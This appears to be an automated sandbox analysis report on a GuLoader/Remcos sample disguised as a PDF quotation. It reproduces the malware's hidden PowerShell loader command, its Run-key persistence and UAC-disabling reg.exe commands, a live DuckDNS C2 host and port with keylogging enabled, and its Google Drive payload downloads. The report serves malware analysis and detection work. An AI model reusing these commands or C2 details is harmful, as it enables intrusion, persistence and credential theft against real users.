Edit tour

Windows Analysis Report
RFQ24060084#U00b7pdf.exe

Overview

General Information

Sample name:	RFQ24060084#U00b7pdf.exe renamed because original name is a hash value
Original sample name:	RFQ24060084pdf.exe
Analysis ID:	1472083
MD5:	4d5aa2285d7426050f478210bae7c5aa
SHA1:	54d7e8ce63dd56acc9dab89d0fe9bdeba0acda96
SHA256:	9f200b4426729f0d0f0b5977709c26f9961594f6612468102cec4dde53afc124
Tags:	exe
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Disables UAC (registry)

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Powershell drops PE file

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses cmd line tools excessively to alter registry or file data

Uses dynamic DNS services

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

RFQ24060084#U00b7pdf.exe (PID: 8072 cmdline: "C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

powershell.exe (PID: 8144 cmdline: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Fatherhoods.exe (PID: 8112 cmdline: "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2224 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 2180 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2788 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

Fatherhoods.exe (PID: 7376 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

Fatherhoods.exe (PID: 7760 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

Fatherhoods.exe (PID: 2652 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

Fatherhoods.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

Fatherhoods.exe (PID: 5276 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

Fatherhoods.exe (PID: 5264 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype" MD5: 4D5AA2285D7426050F478210BAE7C5AA)

svchost.exe (PID: 5076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "}a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.2128913387.000000000BF76000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Fatherhoods.exe PID: 8112	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: Fatherhoods.exe PID: 8112	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Fatherhoods.exe PID: 7376	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: Fatherhoods.exe PID: 5456	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2224, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preoccupant

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7232, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", ProcessId: 2224, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe, ParentProcessId: 8112, ParentProcessName: Fatherhoods.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", ProcessId: 7232, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)", CommandLine: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe, ParentProcessId: 8072, ParentProcessName: RFQ24060084#U00b7pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)", ProcessId: 8144, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5076, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe, ProcessId: 8112, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "}a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: a458386d9.duckdns.org

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Virustotal: Detection: 54%			Perma Link

Multi AV Scanner detection for submitted file

Source: RFQ24060084#U00b7pdf.exe	ReversingLabs: Detection: 40%
Source: RFQ24060084#U00b7pdf.exe	Virustotal: Detection: 54%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fatherhoods.exe PID: 8112, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFQ24060084#U00b7pdf.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe

Code function: 17_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,

17_2_00404423

Source: RFQ24060084#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49712 version: TLS 1.2

Source: RFQ24060084#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2128067857.0000000008CE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2125069144.0000000007BED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2116134547.00000000034D1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2116134547.00000000034D1000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_0040646B FindFirstFileA,FindClose,	7_2_0040646B
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_004027A1 FindFirstFileA,	7_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	7_2_004058BF
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_22C210F1
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C26580 FindFirstFileExA,	7_2_22C26580
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,	17_2_0040AE51
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	18_2_00407EF8
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	22_2_00407898

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\kilns\Unobtainably\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\kilns\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: }a458386d9.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: a458386d9.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.10:49713 -> 217.76.50.73:3256

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 217.76.50.73 217.76.50.73
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256602148.0000000000A49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256602148.0000000000A49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Fatherhoods.exe, 00000007.00000002.2602557067.0000000022BF0000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000013.00000002.2165469830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Fatherhoods.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257531283.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257531283.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Fatherhoods.exe, 00000007.00000002.2601725533.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
